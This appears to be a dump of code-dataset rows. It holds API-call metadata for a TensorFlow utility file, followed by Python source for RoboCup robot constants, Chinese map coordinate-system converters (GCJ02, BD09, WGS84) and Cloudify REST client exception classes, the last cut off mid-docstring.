| [((60, 16, 62, 45), 'tensorflow.ConfigProto', 'tf.ConfigProto', (), '', True, 'import tensorflow as tf\n'), ((74, 5, 74, 23), 'functools.wraps', 'functools.wraps', ({(74, 21, 74, 22): 'f'}, {}), '(f)', False, 'import functools\n'), ((93, 12, 93, 28), 'tensorflow.train.Saver', 'tf.train.Saver', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((98, 12, 98, 28), 'tensorflow.train.Saver', 'tf.train.Saver', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((209, 11, 209, 58), 'tensorflow.split', 'tf.split', (), '', True, 'import tensorflow as tf\n'), ((222, 8, 222, 40), 'tensorflow.concat', 'tf.concat', (), '', True, 'import tensorflow as tf\n'), ((318, 12, 318, 40), 'tensorflow.gradients', 'tf.gradients', ({(318, 25, 318, 29): 'loss', (318, 31, 318, 39): 'var_list'}, {}), '(loss, var_list)', True, 'import tensorflow as tf\n'), ((357, 4, 357, 28), 'tensorflow.reset_default_graph', 'tf.reset_default_graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((369, 4, 369, 21), 'numpy.random.seed', 'np.random.seed', ({(369, 19, 369, 20): 'i'}, {}), '(i)', True, 'import numpy as np\n'), ((370, 4, 370, 18), 'random.seed', 'random.seed', ({(370, 16, 370, 17): 'i'}, {}), '(i)', False, 'import random\n'), ((25, 16, 25, 42), 'tensorflow.cast', 'tf.cast', ({(25, 24, 25, 33): 'condition', (25, 35, 25, 41): '"""bool"""'}, {}), "(condition, 'bool')", True, 'import tensorflow as tf\n'), ((65, 15, 65, 54), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', (), '', True, 'import tensorflow as tf\n'), ((67, 15, 67, 43), 'tensorflow.Session', 'tf.Session', (), '', True, 'import tensorflow as tf\n'), ((85, 33, 85, 72), 'tensorflow.variables_initializer', 'tf.variables_initializer', ({(85, 58, 85, 71): 'new_variables'}, {}), '(new_variables)', True, 'import tensorflow as tf\n'), ((94, 18, 94, 42), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((97, 16, 97, 38), 'os.path.dirname', 'os.path.dirname', ({(97, 32, 97, 37): 'fname'}, {}), '(fname)', False, 'import os\n'), ((99, 15, 99, 39), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((104, 15, 104, 34), 'cloudpickle.load', 'cloudpickle.load', ({(104, 32, 104, 33): 'f'}, {}), '(f)', False, 'import cloudpickle\n'), ((108, 16, 108, 38), 'os.path.dirname', 'os.path.dirname', ({(108, 32, 108, 37): 'fname'}, {}), '(fname)', False, 'import os\n'), ((110, 8, 110, 33), 'cloudpickle.dump', 'cloudpickle.dump', ({(110, 25, 110, 28): 'obj', (110, 30, 110, 32): 'fh'}, {}), '(obj, fh)', False, 'import cloudpickle\n'), ((138, 16, 138, 69), 'os.path.join', 'os.path.join', ({(138, 29, 138, 40): 'self.logdir', (138, 42, 138, 68): '"""checkpoints/model_fn.pkl"""'}, {}), "(self.logdir, 'checkpoints/model_fn.pkl')", False, 'import os\n'), ((139, 15, 139, 36), 'os.path.exists', 'os.path.exists', ({(139, 30, 139, 35): 'fname'}, {}), '(fname)', False, 'import os\n'), ((143, 16, 143, 69), 'os.path.join', 'os.path.join', ({(143, 29, 143, 40): 'self.logdir', (143, 42, 143, 68): '"""checkpoints/model_fn.pkl"""'}, {}), "(self.logdir, 'checkpoints/model_fn.pkl')", False, 'import os\n'), ((158, 12, 158, 43), 'tensorflow.reshape', 'tf.reshape', ({(158, 23, 158, 24): 'h', (158, 26, 158, 42): '[nsteps, nbatch]'}, {}), '(h, [nsteps, nbatch])', True, 'import tensorflow as tf\n'), ((160, 12, 160, 47), 'tensorflow.reshape', 'tf.reshape', ({(160, 23, 160, 24): 'h', (160, 26, 160, 46): '[nsteps, nbatch, -1]'}, {}), '(h, [nsteps, nbatch, -1])', True, 'import tensorflow as tf\n'), ((161, 12, 161, 30), 'tensorflow.squeeze', 'tf.squeeze', ({(161, 23, 161, 24): 'v', (161, 26, 161, 29): '[0]'}, {}), '(v, [0])', True, 'import tensorflow as tf\n'), ((187, 12, 187, 50), 'numpy.random.normal', 'np.random.normal', ({(187, 29, 187, 32): '0.0', (187, 34, 187, 37): '1.0', (187, 39, 187, 49): 'flat_shape'}, {}), '(0.0, 1.0, flat_shape)', True, 'import numpy as np\n'), ((188, 18, 188, 55), 'numpy.linalg.svd', 'np.linalg.svd', (), '', True, 'import numpy as np\n'), ((198, 15, 198, 31), 'tensorflow.constant', 'tf.constant', ({(198, 27, 198, 30): 'out'}, {}), '(out)', True, 'import tensorflow as tf\n'), ((204, 9, 204, 33), 'tensorflow.variable_scope', 'tf.variable_scope', ({(204, 27, 204, 32): 'scope'}, {}), '(scope)', True, 'import tensorflow as tf\n'), ((214, 21, 214, 68), 'tensorflow.split', 'tf.split', (), '', True, 'import tensorflow as tf\n'), ((215, 12, 215, 28), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', ({(215, 26, 215, 27): 'i'}, {}), '(i)', True, 'import tensorflow as tf\n'), ((216, 12, 216, 28), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', ({(216, 26, 216, 27): 'f'}, {}), '(f)', True, 'import tensorflow as tf\n'), ((217, 12, 217, 28), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', ({(217, 26, 217, 27): 'o'}, {}), '(o)', True, 'import tensorflow as tf\n'), ((218, 12, 218, 22), 'tensorflow.tanh', 'tf.tanh', ({(218, 20, 218, 21): 'u'}, {}), '(u)', True, 'import tensorflow as tf\n'), ((278, 28, 278, 46), 'tensorflow.group', 'tf.group', ({(278, 37, 278, 45): '*updates'}, {}), '(*updates)', True, 'import tensorflow as tf\n'), ((315, 15, 315, 25), 'numpy.prod', 'np.prod', ({(315, 23, 315, 24): 'x'}, {}), '(x)', True, 'import numpy as np\n'), ((320, 19, 320, 69), 'tensorflow.clip_by_global_norm', 'tf.clip_by_global_norm', (), '', True, 'import tensorflow as tf\n'), ((332, 29, 332, 64), 'tensorflow.placeholder', 'tf.placeholder', ({(332, 44, 332, 49): 'dtype', (332, 51, 332, 63): '[total_size]'}, {}), '(dtype, [total_size])', True, 'import tensorflow as tf\n'), ((339, 18, 339, 36), 'tensorflow.group', 'tf.group', ({(339, 27, 339, 35): '*assigns'}, {}), '(*assigns)', True, 'import tensorflow as tf\n'), ((368, 8, 368, 29), 'tensorflow.set_random_seed', 'tf.set_random_seed', ({(368, 27, 368, 28): 'i'}, {}), '(i)', True, 'import tensorflow as tf\n'), ((47, 8, 47, 17), 'tensorflow.abs', 'tf.abs', ({(47, 15, 47, 16): 'x'}, {}), '(x)', True, 'import tensorflow as tf\n'), ((48, 8, 48, 20), 'tensorflow.square', 'tf.square', ({(48, 18, 48, 19): 'x'}, {}), '(x)', True, 'import tensorflow as tf\n'), ((76, 13, 76, 25), 'tensorflow.Session', 'tf.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((84, 24, 84, 45), 'tensorflow.global_variables', 'tf.global_variables', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((85, 4, 85, 28), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((115, 20, 115, 55), 'os.path.join', 'os.path.join', ({(115, 33, 115, 39): 'logdir', (115, 41, 115, 54): '"""checkpoints"""'}, {}), "(logdir, 'checkpoints')", False, 'import os\n'), ((161, 40, 161, 92), 'tensorflow.split', 'tf.split', (), '', True, 'import tensorflow as tf\n'), ((173, 26, 173, 53), 'tensorflow.concat', 'tf.concat', (), '', True, 'import tensorflow as tf\n'), ((175, 26, 175, 52), 'tensorflow.stack', 'tf.stack', (), '', True, 'import tensorflow as tf\n'), ((220, 14, 220, 24), 'tensorflow.tanh', 'tf.tanh', ({(220, 22, 220, 23): 'c'}, {}), '(c)', True, 'import tensorflow as tf\n'), ((49, 17, 49, 26), 'tensorflow.abs', 'tf.abs', ({(49, 24, 49, 25): 'x'}, {}), '(x)', True, 'import tensorflow as tf\n'), ((59, 49, 59, 76), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ({}, {}), '()', False, 'import multiprocessing\n'), ((121, 27, 121, 69), 'os.path.join', 'os.path.join', ({(121, 40, 121, 51): 'self.logdir', (121, 53, 121, 68): '"""checkpoints/*"""'}, {}), "(self.logdir, 'checkpoints/*')", False, 'import os\n'), ((196, 14, 196, 37), 'numpy.random.randn', 'np.random.randn', ({(196, 30, 196, 36): '*shape'}, {}), '(*shape)', True, 'import numpy as np\n'), ((207, 53, 207, 81), 'tensorflow.constant_initializer', 'tf.constant_initializer', ({(207, 77, 207, 80): '0.0'}, {}), '(0.0)', True, 'import tensorflow as tf\n'), ((213, 12, 213, 28), 'tensorflow.matmul', 'tf.matmul', ({(213, 22, 213, 23): 'x', (213, 25, 213, 27): 'wx'}, {}), '(x, wx)', True, 'import tensorflow as tf\n'), ((213, 31, 213, 47), 'tensorflow.matmul', 'tf.matmul', ({(213, 41, 213, 42): 'h', (213, 44, 213, 46): 'wh'}, {}), '(h, wh)', True, 'import tensorflow as tf\n'), ((342, 8, 342, 32), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((349, 15, 349, 39), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((184, 26, 184, 45), 'numpy.prod', 'np.prod', ({(184, 34, 184, 44): 'shape[:-1]'}, {}), '(shape[:-1])', True, 'import numpy as np\n'), ((298, 18, 298, 42), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((337, 40, 337, 84), 'tensorflow.reshape', 'tf.reshape', ({(337, 51, 337, 76): 'theta[start:start + size]', (337, 78, 337, 83): 'shape'}, {}), '(theta[start:start + size], shape)', True, 'import tensorflow as tf\n'), ((197, 29, 197, 43), 'numpy.square', 'np.square', ({(197, 39, 197, 42): 'out'}, {}), '(out)', True, 'import numpy as np\n'), ((322, 49, 322, 65), 'tensorflow.zeros_like', 'tf.zeros_like', ({(322, 63, 322, 64): 'v'}, {}), '(v)', True, 'import tensorflow as tf\n'), ((124, 42, 124, 61), 'os.path.basename', 'os.path.basename', ({(124, 59, 124, 60): 'f'}, {}), '(f)', False, 'import os\n')] |
RoboCupULaval/StrategyAI | Util/constant.py | ccddde144f2c0a67113d2e5ffe7c75ed9d4a3d19 | # Under MIT License, see LICENSE.txt
""" Module définissant des constantes de programmations python pour l'IA """
from enum import Enum
ROBOT_RADIUS = 90
ROBOT_DIAMETER = ROBOT_RADIUS * 2
ROBOT_CENTER_TO_KICKER = 60
BALL_RADIUS = 21
MAX_PLAYER_ON_FIELD_PER_TEAM = 6
BALL_OUTSIDE_FIELD_BUFFER = 200
# Radius and angles for tactics
DISTANCE_BEHIND = ROBOT_RADIUS + 30 # in millimeters
ANGLE_TO_GRAB_BALL = 1 # in radians; must be large in case ball moves fast
RADIUS_TO_GRAB_BALL = ROBOT_RADIUS + 30
ANGLE_TO_HALT = 0.05 # 3 degrees
RADIUS_TO_HALT = ROBOT_RADIUS + BALL_RADIUS
REASONABLE_OFFSET = 50 # To take into account the camera precision and other things
# Rules
KEEPOUT_DISTANCE_FROM_BALL = 500 + ROBOT_RADIUS + REASONABLE_OFFSET
KEEPOUT_DISTANCE_FROM_GOAL = ROBOT_RADIUS + REASONABLE_OFFSET
PADDING_DEFENSE_AREA = 100
# Rule 5.2: Minimum movement before a ball is "in play"
IN_PLAY_MIN_DISTANCE = 50
# Rule 8.2.1: Distance from the opposing team defending zone
INDIRECT_KICK_OFFSET = 200
# Deadzones
POSITION_DEADZONE = ROBOT_RADIUS * 0.1
# Orientation abs_tol
ORIENTATION_ABSOLUTE_TOLERANCE = 0.01 # 0.5 degree
# TeamColor
class TeamColor(Enum):
def __str__(self):
return 'blue' if self == TeamColor.BLUE else 'yellow'
YELLOW = 0
BLUE = 1
class FieldSide(Enum):
POSITIVE = 0
NEGATIVE = 1
class KickForce(Enum):
NONE = 0
LOW = 1
MEDIUM = 2
HIGH = 3
@classmethod
def for_dist(cls, dist, seconds_to_reach=1.0):
speed = (dist / 1000) / seconds_to_reach
return speed
class KickType(Enum):
DIRECT = 0
CHIP = 1
class DribbleState(Enum):
AUTOMATIC = 0
FORCE_STOP = 1
FORCE_SPIN = 2
| [] |
cirno1w/transport | src/transbigdata/CoordinatesConverter.py | f088b4111992dd5ec6371db71cf1d26689cf8c26 |
import numpy as np
x_pi = 3.14159265358979324 * 3000.0 / 180.0
pi = 3.1415926535897932384626
a = 6378245.0
ee = 0.00669342162296594323
def gcj02tobd09(lng, lat):
"""
Convert coordinates from GCJ02 to BD09
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
lng = lng.astype(float)
lat = lat.astype(float)
except:
lng = float(lng)
lat = float(lat)
z = np.sqrt(lng * lng + lat * lat) + 0.00002 * np.sin(lat * x_pi)
theta = np.arctan2(lat, lng) + 0.000003 * np.cos(lng * x_pi)
bd_lng = z * np.cos(theta) + 0.0065
bd_lat = z * np.sin(theta) + 0.006
return bd_lng, bd_lat
def bd09togcj02(bd_lon, bd_lat):
"""
Convert coordinates from BD09 to GCJ02
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
bd_lon = bd_lon.astype(float)
bd_lat = bd_lat.astype(float)
except:
bd_lon = float(bd_lon)
bd_lat = float(bd_lat)
x = bd_lon - 0.0065
y = bd_lat - 0.006
z = np.sqrt(x * x + y * y) - 0.00002 * np.sin(y * x_pi)
theta = np.arctan2(y, x) - 0.000003 * np.cos(x * x_pi)
gg_lng = z * np.cos(theta)
gg_lat = z * np.sin(theta)
return gg_lng, gg_lat
def wgs84togcj02(lng, lat):
"""
Convert coordinates from WGS84 to GCJ02
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
lng = lng.astype(float)
lat = lat.astype(float)
except:
lng = float(lng)
lat = float(lat)
dlat = transformlat(lng - 105.0, lat - 35.0)
dlng = transformlng(lng - 105.0, lat - 35.0)
radlat = lat / 180.0 * pi
magic = np.sin(radlat)
magic = 1 - ee * magic * magic
sqrtmagic = np.sqrt(magic)
dlat = (dlat * 180.0) / ((a * (1 - ee)) / (magic * sqrtmagic) * pi)
dlng = (dlng * 180.0) / (a / sqrtmagic * np.cos(radlat) * pi)
mglat = lat + dlat
mglng = lng + dlng
return mglng, mglat
def gcj02towgs84(lng, lat):
"""
Convert coordinates from GCJ02 to WGS84
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
lng = lng.astype(float)
lat = lat.astype(float)
except:
lng = float(lng)
lat = float(lat)
dlat = transformlat(lng - 105.0, lat - 35.0)
dlng = transformlng(lng - 105.0, lat - 35.0)
radlat = lat / 180.0 * pi
magic = np.sin(radlat)
magic = 1 - ee * magic * magic
sqrtmagic = np.sqrt(magic)
dlat = (dlat * 180.0) / ((a * (1 - ee)) / (magic * sqrtmagic) * pi)
dlng = (dlng * 180.0) / (a / sqrtmagic * np.cos(radlat) * pi)
mglat = lat + dlat
mglng = lng + dlng
return lng * 2 - mglng, lat * 2 - mglat
def wgs84tobd09(lon,lat):
"""
Convert coordinates from WGS84 to BD09
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
lon = lon.astype(float)
lat = lat.astype(float)
except:
lon = float(lon)
lat = float(lat)
lon,lat = wgs84togcj02(lon,lat)
lon,lat = gcj02tobd09(lon,lat)
return lon,lat
def bd09towgs84(lon,lat):
"""
Convert coordinates from BD09 to WGS84
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
lon = lon.astype(float)
lat = lat.astype(float)
except:
lon = float(lon)
lat = float(lat)
lon,lat = bd09togcj02(lon,lat)
lon,lat = gcj02towgs84(lon,lat)
return lon,lat
def bd09mctobd09(x,y):
"""
Convert coordinates from BD09MC to BD09
Parameters
-------
x : Series or number
x coordinates
y : Series or number
y coordinates
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
MCBAND = [12890594.86, 8362377.87, 5591021, 3481989.83, 1678043.12, 0]
MC2LL = [
[1.410526172116255e-8, 0.00000898305509648872, -1.9939833816331, 200.9824383106796, -187.2403703815547, 91.6087516669843, -23.38765649603339, 2.57121317296198, -0.03801003308653, 17337981.2],
[-7.435856389565537e-9, 0.000008983055097726239, -0.78625201886289, 96.32687599759846, -1.85204757529826, -59.36935905485877, 47.40033549296737, -16.50741931063887, 2.28786674699375, 10260144.86],
[-3.030883460898826e-8, 0.00000898305509983578, 0.30071316287616, 59.74293618442277, 7.357984074871, -25.38371002664745, 13.45380521110908, -3.29883767235584, 0.32710905363475, 6856817.37],
[-1.981981304930552e-8, 0.000008983055099779535, 0.03278182852591, 40.31678527705744, 0.65659298677277, -4.44255534477492, 0.85341911805263, 0.12923347998204, -0.04625736007561, 4482777.06],
[3.09191371068437e-9, 0.000008983055096812155, 0.00006995724062, 23.10934304144901, -0.00023663490511, -0.6321817810242, -0.00663494467273, 0.03430082397953, -0.00466043876332, 2555164.4],
[2.890871144776878e-9, 0.000008983055095805407, -3.068298e-8, 7.47137025468032, -0.00000353937994, -0.02145144861037, -0.00001234426596, 0.00010322952773, -0.00000323890364, 826088.5]
]
y1 = y.iloc[0]
for cD in range(len(MCBAND)):
if y1 >= MCBAND[cD]:
cE = MC2LL[cD]
break
cD = cE
T = cD[0] + cD[1] * np.abs(x);
cB = np.abs(y) / cD[9]
cE = cD[2] + cD[3] * cB + cD[4] * cB * cB +\
cD[5] * cB * cB * cB + cD[6] * cB * cB * cB * cB +\
cD[7] * cB * cB * cB * cB * cB +\
cD[8] * cB * cB * cB * cB * cB * cB
return T,cE
def transformlat(lng, lat):
ret = -100.0 + 2.0 * lng + 3.0 * lat + 0.2 * lat * lat + \
0.1 * lng * lat + 0.2 * np.sqrt(np.fabs(lng))
ret += (20.0 * np.sin(6.0 * lng * pi) + 20.0 *
np.sin(2.0 * lng * pi)) * 2.0 / 3.0
ret += (20.0 * np.sin(lat * pi) + 40.0 *
np.sin(lat / 3.0 * pi)) * 2.0 / 3.0
ret += (160.0 * np.sin(lat / 12.0 * pi) + 320 *
np.sin(lat * pi / 30.0)) * 2.0 / 3.0
return ret
def transformlng(lng, lat):
import numpy as np
ret = 300.0 + lng + 2.0 * lat + 0.1 * lng * lng + \
0.1 * lng * lat + 0.1 * np.sqrt(np.abs(lng))
ret += (20.0 * np.sin(6.0 * lng * pi) + 20.0 *
np.sin(2.0 * lng * pi)) * 2.0 / 3.0
ret += (20.0 * np.sin(lng * pi) + 40.0 *
np.sin(lng / 3.0 * pi)) * 2.0 / 3.0
ret += (150.0 * np.sin(lng / 12.0 * pi) + 300.0 *
np.sin(lng / 30.0 * pi)) * 2.0 / 3.0
return ret
def getdistance(lon1, lat1, lon2, lat2):
'''
Input the origin/destination location in the sequence of [lon1, lat1, lon2, lat2] (in decimal) from DataFrame. The output is the distance (m).
Parameters
-------
lon1 : Series or number
Start longitude
lat1 : Series or number
Start latitude
lon2 : Series or number
End longitude
lat2 : Series or number
End latitude
return
-------
distance : Series or number
The distance
'''
try:
lon1 = lon1.astype(float)
lat1 = lat1.astype(float)
lon2 = lon2.astype(float)
lat2 = lat2.astype(float)
except:
lon1 = float(lon1)
lat1 = float(lat1)
lon2 = float(lon2)
lat2 = float(lat2)
lon1, lat1, lon2, lat2 = map(lambda r:r*pi/180, [lon1, lat1, lon2, lat2])
dlon = lon2 - lon1
dlat = lat2 - lat1
a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2
c = 2 * np.arcsin(a**0.5)
r = 6371 # 地球平均半径,单位为公里
return c * r * 1000
def transform_shape(gdf,method):
'''
Convert coordinates of all data. The input is the geographic elements’ DataFrame.
Parameters
-------
gdf : GeoDataFrame
Geographic elements
method : function
The coordinate converting function
return
-------
gdf : GeoDataFrame
The result of converting
'''
from shapely.ops import transform
gdf1 = gdf.copy()
gdf1['geometry'] = gdf1['geometry'].apply(lambda r:transform(method, r))
return gdf1 | [((99, 12, 99, 26), 'numpy.sin', 'np.sin', ({(99, 19, 99, 25): 'radlat'}, {}), '(radlat)', True, 'import numpy as np\n'), ((101, 16, 101, 30), 'numpy.sqrt', 'np.sqrt', ({(101, 24, 101, 29): 'magic'}, {}), '(magic)', True, 'import numpy as np\n'), ((136, 12, 136, 26), 'numpy.sin', 'np.sin', ({(136, 19, 136, 25): 'radlat'}, {}), '(radlat)', True, 'import numpy as np\n'), ((138, 16, 138, 30), 'numpy.sqrt', 'np.sqrt', ({(138, 24, 138, 29): 'magic'}, {}), '(magic)', True, 'import numpy as np\n'), ((32, 8, 32, 38), 'numpy.sqrt', 'np.sqrt', ({(32, 16, 32, 37): '(lng * lng + lat * lat)'}, {}), '(lng * lng + lat * lat)', True, 'import numpy as np\n'), ((33, 12, 33, 32), 'numpy.arctan2', 'np.arctan2', ({(33, 23, 33, 26): 'lat', (33, 28, 33, 31): 'lng'}, {}), '(lat, lng)', True, 'import numpy as np\n'), ((65, 8, 65, 30), 'numpy.sqrt', 'np.sqrt', ({(65, 16, 65, 29): '(x * x + y * y)'}, {}), '(x * x + y * y)', True, 'import numpy as np\n'), ((66, 12, 66, 28), 'numpy.arctan2', 'np.arctan2', ({(66, 23, 66, 24): 'y', (66, 26, 66, 27): 'x'}, {}), '(y, x)', True, 'import numpy as np\n'), ((67, 17, 67, 30), 'numpy.cos', 'np.cos', ({(67, 24, 67, 29): 'theta'}, {}), '(theta)', True, 'import numpy as np\n'), ((68, 17, 68, 30), 'numpy.sin', 'np.sin', ({(68, 24, 68, 29): 'theta'}, {}), '(theta)', True, 'import numpy as np\n'), ((235, 9, 235, 18), 'numpy.abs', 'np.abs', ({(235, 16, 235, 17): 'y'}, {}), '(y)', True, 'import numpy as np\n'), ((299, 12, 299, 29), 'numpy.arcsin', 'np.arcsin', ({(299, 22, 299, 28): '(a ** 0.5)'}, {}), '(a ** 0.5)', True, 'import numpy as np\n'), ((32, 51, 32, 69), 'numpy.sin', 'np.sin', ({(32, 58, 32, 68): '(lat * x_pi)'}, {}), '(lat * x_pi)', True, 'import numpy as np\n'), ((33, 46, 33, 64), 'numpy.cos', 'np.cos', ({(33, 53, 33, 63): '(lng * x_pi)'}, {}), '(lng * x_pi)', True, 'import numpy as np\n'), ((34, 17, 34, 30), 'numpy.cos', 'np.cos', ({(34, 24, 34, 29): 'theta'}, {}), '(theta)', True, 'import numpy as np\n'), ((35, 17, 35, 30), 'numpy.sin', 'np.sin', ({(35, 24, 35, 29): 'theta'}, {}), '(theta)', True, 'import numpy as np\n'), ((65, 43, 65, 59), 'numpy.sin', 'np.sin', ({(65, 50, 65, 58): '(y * x_pi)'}, {}), '(y * x_pi)', True, 'import numpy as np\n'), ((66, 42, 66, 58), 'numpy.cos', 'np.cos', ({(66, 49, 66, 57): '(x * x_pi)'}, {}), '(x * x_pi)', True, 'import numpy as np\n'), ((234, 24, 234, 33), 'numpy.abs', 'np.abs', ({(234, 31, 234, 32): 'x'}, {}), '(x)', True, 'import numpy as np\n'), ((298, 8, 298, 22), 'numpy.sin', 'np.sin', ({(298, 15, 298, 21): '(dlat / 2)'}, {}), '(dlat / 2)', True, 'import numpy as np\n'), ((321, 55, 321, 75), 'shapely.ops.transform', 'transform', ({(321, 65, 321, 71): 'method', (321, 73, 321, 74): 'r'}, {}), '(method, r)', False, 'from shapely.ops import transform\n'), ((103, 45, 103, 59), 'numpy.cos', 'np.cos', ({(103, 52, 103, 58): 'radlat'}, {}), '(radlat)', True, 'import numpy as np\n'), ((140, 45, 140, 59), 'numpy.cos', 'np.cos', ({(140, 52, 140, 58): 'radlat'}, {}), '(radlat)', True, 'import numpy as np\n'), ((244, 40, 244, 52), 'numpy.fabs', 'np.fabs', ({(244, 48, 244, 51): 'lng'}, {}), '(lng)', True, 'import numpy as np\n'), ((256, 40, 256, 51), 'numpy.abs', 'np.abs', ({(256, 47, 256, 50): 'lng'}, {}), '(lng)', True, 'import numpy as np\n'), ((298, 28, 298, 40), 'numpy.cos', 'np.cos', ({(298, 35, 298, 39): 'lat1'}, {}), '(lat1)', True, 'import numpy as np\n'), ((298, 43, 298, 55), 'numpy.cos', 'np.cos', ({(298, 50, 298, 54): 'lat2'}, {}), '(lat2)', True, 'import numpy as np\n'), ((298, 58, 298, 72), 'numpy.sin', 'np.sin', ({(298, 65, 298, 71): '(dlon / 2)'}, {}), '(dlon / 2)', True, 'import numpy as np\n'), ((245, 19, 245, 41), 'numpy.sin', 'np.sin', ({(245, 26, 245, 40): '(6.0 * lng * pi)'}, {}), '(6.0 * lng * pi)', True, 'import numpy as np\n'), ((246, 12, 246, 34), 'numpy.sin', 'np.sin', ({(246, 19, 246, 33): '(2.0 * lng * pi)'}, {}), '(2.0 * lng * pi)', True, 'import numpy as np\n'), ((247, 19, 247, 35), 'numpy.sin', 'np.sin', ({(247, 26, 247, 34): '(lat * pi)'}, {}), '(lat * pi)', True, 'import numpy as np\n'), ((248, 12, 248, 34), 'numpy.sin', 'np.sin', ({(248, 19, 248, 33): '(lat / 3.0 * pi)'}, {}), '(lat / 3.0 * pi)', True, 'import numpy as np\n'), ((249, 20, 249, 43), 'numpy.sin', 'np.sin', ({(249, 27, 249, 42): '(lat / 12.0 * pi)'}, {}), '(lat / 12.0 * pi)', True, 'import numpy as np\n'), ((250, 12, 250, 35), 'numpy.sin', 'np.sin', ({(250, 19, 250, 34): '(lat * pi / 30.0)'}, {}), '(lat * pi / 30.0)', True, 'import numpy as np\n'), ((257, 19, 257, 41), 'numpy.sin', 'np.sin', ({(257, 26, 257, 40): '(6.0 * lng * pi)'}, {}), '(6.0 * lng * pi)', True, 'import numpy as np\n'), ((258, 12, 258, 34), 'numpy.sin', 'np.sin', ({(258, 19, 258, 33): '(2.0 * lng * pi)'}, {}), '(2.0 * lng * pi)', True, 'import numpy as np\n'), ((259, 19, 259, 35), 'numpy.sin', 'np.sin', ({(259, 26, 259, 34): '(lng * pi)'}, {}), '(lng * pi)', True, 'import numpy as np\n'), ((260, 12, 260, 34), 'numpy.sin', 'np.sin', ({(260, 19, 260, 33): '(lng / 3.0 * pi)'}, {}), '(lng / 3.0 * pi)', True, 'import numpy as np\n'), ((261, 20, 261, 43), 'numpy.sin', 'np.sin', ({(261, 27, 261, 42): '(lng / 12.0 * pi)'}, {}), '(lng / 12.0 * pi)', True, 'import numpy as np\n'), ((262, 12, 262, 35), 'numpy.sin', 'np.sin', ({(262, 19, 262, 34): '(lng / 30.0 * pi)'}, {}), '(lng / 30.0 * pi)', True, 'import numpy as np\n')] |
aleixsanchis/cloudify-rest-client | cloudify_rest_client/exceptions.py | 6acaadee8286ab647465824d3c8e13d4c43ca9ba | ########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
class CloudifyClientError(Exception):
def __init__(self, message, server_traceback=None,
status_code=-1, error_code=None, response=None):
super(CloudifyClientError, self).__init__(message)
self.status_code = status_code
self.error_code = error_code
self.server_traceback = server_traceback
self.response = response
self.message = message
def __str__(self):
if self.status_code != -1:
formatted_error = '{0}: {1}'.format(self.status_code, self.message)
return formatted_error
return self.message
class DeploymentEnvironmentCreationInProgressError(CloudifyClientError):
"""
Raised when there's attempt to execute a deployment workflow and
deployment environment creation workflow execution is still running.
In such a case, workflow execution should be retried after a reasonable
time or after the execution of deployment environment creation workflow
has terminated.
"""
ERROR_CODE = 'deployment_environment_creation_in_progress_error'
class DeploymentEnvironmentCreationPendingError(CloudifyClientError):
"""
Raised when there's attempt to execute a deployment workflow and
deployment environment creation workflow execution is pending.
In such a case, workflow execution should be retried after a reasonable
time or after the execution of deployment environment creation workflow
has terminated.
"""
ERROR_CODE = 'deployment_environment_creation_pending_error'
class IllegalExecutionParametersError(CloudifyClientError):
"""
Raised when an attempt to execute a workflow with wrong/missing parameters
has been made.
"""
ERROR_CODE = 'illegal_execution_parameters_error'
class NoSuchIncludeFieldError(CloudifyClientError):
"""
Raised when an _include query parameter contains a field which does not
exist for the queried data model.
"""
ERROR_CODE = 'no_such_include_field_error'
class MissingRequiredDeploymentInputError(CloudifyClientError):
"""
Raised when a required deployment input was not specified on deployment
creation.
"""
ERROR_CODE = 'missing_required_deployment_input_error'
class UnknownDeploymentInputError(CloudifyClientError):
"""
Raised when an unexpected input was specified on deployment creation.
"""
ERROR_CODE = 'unknown_deployment_input_error'
class UnknownDeploymentSecretError(CloudifyClientError):
"""
Raised when a required secret was not found on deployment creation.
"""
ERROR_CODE = 'unknown_deployment_secret_error'
class UnsupportedDeploymentGetSecretError(CloudifyClientError):
"""
Raised when an unsupported get_secret intrinsic function appears in
the blueprint on deployment creation.
"""
